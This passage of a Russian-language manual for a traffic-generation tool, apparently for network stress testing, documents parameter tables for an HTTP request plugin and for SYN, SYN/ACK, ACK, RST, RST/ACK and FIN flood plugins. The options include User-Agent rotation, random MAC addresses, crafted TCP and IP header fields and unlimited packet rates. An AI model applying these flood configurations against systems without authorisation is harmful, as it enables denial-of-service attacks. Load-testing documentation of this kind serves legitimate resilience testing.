Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.выберите значение HTTP 1.1 или HTTP 2.0
User-AgentЗаголовок, который идентифицирует клиентское приложение (например, браузер) и операционную систему, с которой осуществляется запрос.Введите значение заголовка: по умолчанию, значением заголовка является: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36» ${userAgent} - Обеспечивает ротацию User-Agent: для каждого запроса выбирается случайный валидный вариант из списка в веб-интерфейсе
ПутьУказывает путь к запрашиваемому ресурсу на сервере. Это часть URL, которая следует за доменным именем.Введите значение пути (по умолчанию, значение пути является корневая директория сервера: «/»)
HTTP методМетод, используемый для запроса ресурса на сервере.выберите из следующего списка:
GET
POST
PUT
PATCH
DELETE
HTTP статусОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы содержащие код ответа 3ХХ будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «location»Включить/выключить тумблер
HTML Meta RefreshОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы, содержащие в ответе HTML страницу с meta-тегом «refresh» будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «content», включая задержкуВключить/выключить тумблер
ГлубинаЗначение максимально допустимого количества переадресаций в рамках одной TCP сессииЗадайте свое значение (по умолчанию, значение равно «20»)
Query параметрыПараметры, передаваемые в URL после знака вопроса (?)Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
ЗаголовкиДополнительные метаданные, отправляемые вместе с HTTP-запросом.Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указано в Табл. 42;

Табл. 42 – Параметры «Параметры сессии»

НазваниеОписаниеЗначение
Общее количество сессийМаксимальное количество одновременно активных сессий, которые могут быть установлены в рамках плагина.Задайте числовое значение
Тайм-аут повторного подключенияВремя в секундах, в течение которого Пересвет-СТ будет пытаться восстановить соединение после его разрыва. Если соединение не будет восстановлено в указанный период, сессия будет закрыта.Задайте числовое значение
Подключений в секундуМаксимальное количество новых сессий, которые могут быть установлены за одну секунду.Задайте числовое значение
Макс. стримов (на сессию)Максимальное количество потоков данных, которые могут быть активны в одной сессии. Параметр доступен только при включении H2 в «Параметрах HTTP».Задайте числовое значение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Запросов в секунду (на сессию)Максимальное количество запросов, которые могут быть обработаны в секунду для одной сессии/стрима.Задайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 43.

Табл. 43 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

SYN Flood

SYN Flood – плагин для генерации трафика, в котором отправляется большое количество запросов на установление TCP-соединения (SYN-пакеты) без завершения процесса.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 44;

Табл. 44 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 45;

Табл. 45 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 46;

Табл. 46 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 47;

Табл. 47 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачи Параметр доступен, если параметр «Случайный Sequence Number» выключенЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 48;

Табл. 48 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 49.

Табл. 49 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

SYN/ACK Flood

SYN/ACK Flood – плагин для генерации трафика, который отправляет большое количество пакетов SYN-ACK на цель, заставляя ее обрабатывать множество соединений.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 50;

Табл. 50 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 51;

Табл. 51 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 52;

Табл. 52 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 53;

Табл. 53 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 54;

Табл. 54 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 55.

Табл. 56 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

ACK Flood

ACK Flood – плагин для генерации трафика, который отправляет большое количество пакетов с установленным флагом ACK на цель, заставляя ее обрабатывать множество соединений.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 57;

Табл. 57 - Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»);
НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 58;

Табл. 58 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 59;

Табл. 59 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 60;

Табл. 60 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 61.

Табл. 61 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

RST Flood

RST Flood – плагин для генерации трафика, который отправляет большое количество пакетов с установленным флагом RST на цель, которые сбрасывают активные TCP-соединения на целевом сервере.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 62;

Табл. 62 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 63;

Табл. 63 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 64;

Табл. 64 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 65;

Табл. 65 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 66;

Табл. 66 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 67.

Табл. 67 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

RST/ACK Flood

RST/ACK Flood – плагин для генерации трафика, который отправляет большое количество пакетов с установленными флагами RST и ACK, что приводит к сбросу соединений и нарушению нормального обмена данными.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 68;

Табл. 68 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 69;

Табл. 69 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 70;

Табл. 707 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 71;

Табл. 71 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 72;

Табл. 72 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 73.

Табл. 73 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

FIN Flood

FIN Flood – плагин для генерации трафика, который отправляет большое количество пакетов с установленным с флагом FIN для завершения TCP-соединений. Этот шаблон используется для тестирования устойчивости сервера к неожиданным запросам на завершение соединений.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 74;

    Табл. 74 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 75;

Табл. 75 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 76;

Табл. 76 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 77;

Табл. 77 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
